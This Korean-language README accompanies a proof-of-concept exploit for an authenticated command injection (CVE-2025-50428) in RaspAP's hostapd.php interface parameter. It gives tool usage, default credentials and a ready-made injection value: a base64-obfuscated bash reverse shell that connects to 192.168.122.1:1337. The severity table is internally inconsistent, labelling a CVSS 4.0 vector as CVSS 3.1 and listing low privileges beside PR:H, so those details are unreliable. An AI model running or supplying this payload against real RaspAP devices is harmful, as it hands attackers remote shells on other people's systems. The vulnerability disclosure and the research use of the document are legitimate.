
취약점 CVE-2025-50428에 대한 개념 증명: RaspAP의 인증된 OS 명령어 주입
CVE-2025-50428에 대한 개념 증명(PoC) 익스플로잇으로, RaspAP raspap-webgui 3.2.9 및 이전 버전의 명령 주입 취약점입니다.
| 취약점 ID | CVE-2025-50428 |
|---|---|
| 심각도 | 높음 (CVSS 3.1: 8.6) |
| CVSS 벡터 | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| 취약점 유형 | 코드 주입 |
| 공격 경로 | 원격 (인증됨) |
| 필요 권한 | 낮음 |
| 영향 | 코드 실행, 권한 상승 |
| 영향받는 제품 | raspap-webgui ≤ 3.2.9 |
| 발견자 | SmartTECS Cyber Security GmbH |
이 익스플로잇은 RaspAP의 hostapd.php 스크립트에 존재하는 명령 주입 취약점을 대상으로 합니다. 이 취약점은 interface 매개변수를 통해 전달되는 사용자 입력에 대한 필터링이 미흡하여 발생합니다. 인증된 공격자는 임의의 OS 명령을 주입할 수 있으며, 그 결과 www-data 사용자의 권한으로 코드가 실행됩니다.
requests 라이브러리 설치python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url: RaspAP 설치의 기본 URL (예: http://192.168.122.22)--interface: interface 매개변수의 값, 인젝션 페이로드 허용--username: RaspAP 사용자 이름 (기본값: admin)--password: RaspAP 비밀번호 (기본값: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH는 침투 테스트, 보안 소프트웨어 개발 및 취약점 연구를 전문으로 하는 사이버 보안 기업입니다. 이 회사는 조직이 진화하는 사이버 위협으로부터 중요 시스템을 보호할 수 있도록 맞춤형 보안 평가, 침해 대응 및 전략적 자문 서비스를 제공합니다.
이 도구는 교육 및 연구 목적으로만 제공됩니다. 소유했거나 명시적 허가를 받아 관리하는 시스템에서만 사용하십시오. 작성자와 SmartTECS Cyber Security GmbH는 오용 또는 손상에 대해 어떠한 책임도 지지 않습니다.